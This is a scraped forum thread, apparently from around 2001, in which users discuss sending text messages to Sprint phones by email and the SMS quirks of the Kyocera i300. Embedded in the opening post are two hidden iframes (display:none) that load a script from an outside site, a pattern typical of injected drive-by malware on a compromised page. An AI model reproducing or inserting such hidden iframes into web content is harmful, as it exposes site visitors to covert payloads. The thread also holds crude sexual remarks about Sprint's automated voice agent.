+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Page / Message - Is there a way

I know there is a way for people to send a message to me using Sprints Web site.

Is there a way for someone to use EMAIL to send a quick message to me... sprintphonenumber@something.com???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

yournumber@mobile.sprintpcs.com

I'm pretty sure thats it. If not its .mobile@spcs

email to:
    yournumber@messaging.sprintpcs.com

What I have done at our company is to set up an alias that point to my phone. When someone sends an email to pagecarl@ediconsulting.com, it gets forwarded to my phone. Works great except the character limit.
    cjg

Interesting...it used to be [number]@messaging.sprintpcs.com but I just tried it and it didn't work. I know that address used to work for me, I remember going through hoops to find out what it was.

I just tried the other two options you gave and neither one of them worked.

SammyTerry:
    I just send an email to mynumber@messaging.sprintpcs.com and it worked just fine. At least in the ATL area.
    Cjg

Very interesting, indeed. I have been complaining about SMS on this phone since day one. I couldn't stand it for the following reasons:

1) Incoming SMS messages did not have any of the text of the message.
    2) To read the message you had to connect to the internet (thus using up minutes).
    3) To compose a message, you had to connect to the internet as well (using up even more minutes).

Well, I just discovered that there are, apparently, a few different ways of sending messages. Here goes:

Method 1 - Short Mail via the "Web Alerts" app
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    I go into "Web Alerts" and choose "Short Mail". I have to connect to the web in order to use this. First, I notice that the last two messages I've received from my wife via this method are out there. They've been there for a couple of weeks now and I see no way to delete them. From the main menu I can compose a message. When composing a message, there is no separate subject line and message body, just the message body itself. When I receive a message via this method (e.g. - from my wife who also has an i300), I am alerted that I have a message, but I get no portion whatsoever of the message itself. I have to connect to the web (thus using up my minutes) just to read a simple text message. The one upside is that I can reply to the message directly from here.

This method stinks for the reasons I outlined at the top of my reply. But wait, things get better...

Method 2 - Sending an email
    ~~~~~~~~~~~~~~~~~~
    You can do this via any email program by sending the message to yournumber@messaging.sprintpcs.com or by using the interface on the SprintPCS web site. If you use your own email program, you can also utilize the subject line. If you use the Sprint site, there's no subject line but you can provide a callback number. Here's the great news: A message received on the i300 via this method will display both the subject line and the message text, all without having to connect to the internet. The Sprint site limits you to 100 characters. I'm not sure if that same limit applies when using your own email program. Furthermore, if you've specified a callback number via the Sprint site, when you receive the message, you can tap on the "Call" button and it will call the number automatically. The only thing missing here is MOSMS (mobile-originated SMS) to allow for replying. However, you can be connected to the web (doing other things) and get an SMS message via this method, without disrupting your connection. This means that you could quickly fire up a PQA, go to a web page which allows you to send email via Blazer, or use some other method, to quickly respond to a message. One downside is that I seemed to get the messages in duplicate form. If this continues, I'll have to complain about it since I think there's a limit to the number of free SMS messages we get through Sprint (anyone?).

Messages received via this method will appear in the Page/Text area of your phone. From the phone mode, I went into the drop-down menu and selected "Messages" and then "Page/Text". The message was stored there (just once, no duplicate). From there I could select the message and then choose to delete it.

So, what have we learned here? Don't use "Web Alerts" for SMS purposes. Tell your friends to SMS you via the Sprint site or by emailing you at yournumber@messaging.sprintpcs.com

Scott
    Last edited by Scott R; 12-18-2001 at 03:49 PM.

Scott:
    I have been using method number 2 to receive messages on my phone for quite some time. It worked exactly the same way on the Kyo 6035 also. I don't get the value of the Web Alert message, and I never use them. As I mentioned before, I have a alias mapped in our exchange server to route to my phone, so my phone email and laptop both use the same domain name (@ediconsulting.com). We monitor our and several of our clients networks using the text message function. It works very well. There is a limit of free messages per month (which is BS if you ask me), and I always go over, but I don't recall off the top of my head what the number is. Our network checks in twice a day and sends a message just to say, "I'm here". It also allows me to verify the Sprint messaging service is working.... I have had several times where their network is down and NO PAGES or TEXT messages come through. They are usually very clueless when I call and try to explain what is not working.

There is also another way to send a text message to a phone, using a TAPI 1.5 compliant software. This is software that uses a modem to call a special phone number at sprint. A modem answers and the message is sent to the sprint network. You must have an application that supports this standard. (I think a lot of text pagers use this standard). You may ask why this would be valuable if you can send an email to your phone. Well, in our case we monitor our network. If our T1 goes down, the email message can not go out, so our network monitor detects this and uses the TAPI interface to dial into Sprints network to place the call. What's UP Gold supports this interface.

I ditched my pager quite a while ago because of the text messaging/paging capabilities of the phone. I have not missed the old pager... not even once. So I have gone from pager/palm/cell phone to one very cool device.
    Carl

Carl, thanks for the info. My wife and I run a web development home-based business in addition to our day jobs. I've been planning on doing something along the lines of what you're doing to redirect emails sent to our "support" email address. As I initially explored the i300, I was concerned that "Web Alerts" was all there was and was really let down. Unfortunately, unlike a pager, the Sprint network isn't as wide-covering. Another problem I have is that I can't get a signal at my house (I can a bit farther down my street, just not at my house), so I'm still uneasy about relying on SMS as a way to always get a hold of me.

Scott

I don't know why the messaging address isn't working for me now, it definetly did at one time. When I goto the SprintPCS website and try to send my phone mail through their web form it says my number isn't valid. Odd. Oh, well, I'm not too bothered by it being I never used that feature anyway.

Scott:
    Is the i300 your first Sprint phone? I posted in another thread that I had trouble w/Sprint signal at my house also (it is not terrible, but not great), but noticed the i300 gets a great signal. I have had to use my other Sprint phones sitting still or on my screen porch, but the i300 works great. There was also another thread about someone trying out an external antenna. Maybe that might help you. I know it is not the same as having the phone actually be mobile in your house. Good luck with your "part time" business. . Hopefully you can quite your day job. I am a consultant and one of the BEST parts about the i300 (and also the 6035) was being able to support clients from anywhere. I can dial into my network or clients networks, telnet into routers, telnet into AS400s and even use the web interfaces of various pieces of hardware (ie printers, RF controllers) from anywhere. I have so much flrexibility and still can provide top notch for my clients. Sure the phone is slow and the screen is slow, but it does work and works well.
    Carl

Sammy:
    I think you have to have the text messaging feature turned on. My wife has a Sprint phone on my business account and I can not send text messages to her phone. In her case it makes not difference, though, she would never be able to figure out how to look at them..... but that's another talk show altogether!!!
    cjg

Administrator

Arrow

heh... me and my ol' lady use the old fashioned way... voicemail.. :p

How many of these emails can we send to our phone each month without getting charged. I think I remember reading somewhere that it was 50. I have the standard wireless web package for $5 a month.

Thanks,
    Eddie

Administrator

Arrow

they are called "alerts" and you can get thousands/month if you want.. there is no limit, however, you are inly getting 50 for free.... and then you pay for the rest...

i do believe you can get up to 100/month for a fixed rate and then pay after... :p

Strange, it doesn't work for me

I even went to the website, and tried sending an sms message to my wife's phone. I got an error:
    PCS Phone number is not a valid number. Please try again. Thank you.

I tried emailing mynumber@messaging.sprintpcs.com , and it gets bumped back:

host bulk.sprintpcs.com[208.18.146.109]
    said: 550 Invalid recipient: <mynumber@messaging.sprintpcs.com>

Of course, I mean my sprint pcs number.

I know this used to work a while back. I could try calling sprint customer dare, but i have plans this weekend.

Actually, the last 3 or 4 times I've called Sprint I've gotten right through to a live person immediately or within a few minutes.

Did you talk to Clare?

Clare is a slut, and she owes me money!

Yes, I did talk to Clare. She is quite annoying. Perhaps Sprint should send a users guide with our invoices. One must know how to speak "Clare" in order for the process to glide smoothly. I think she doesz help considerably. Though I do get very frustrated at times when I can't "tell her" my problem, when I am able to get the point across, my wait is much lower if any.

Administrator

Arrow

a slut eh? hell, give her my numbmer and tell her to call me!!

shes a cutie though...

i never use claire... when she comes on , i just say "customer service"... she wil say.."ok.. but first let me...." and i will interrupt her again and say "customer service" for a second time.. then she will take me to customer service...
    hell.. come to think of it.. she owes ME money also! :p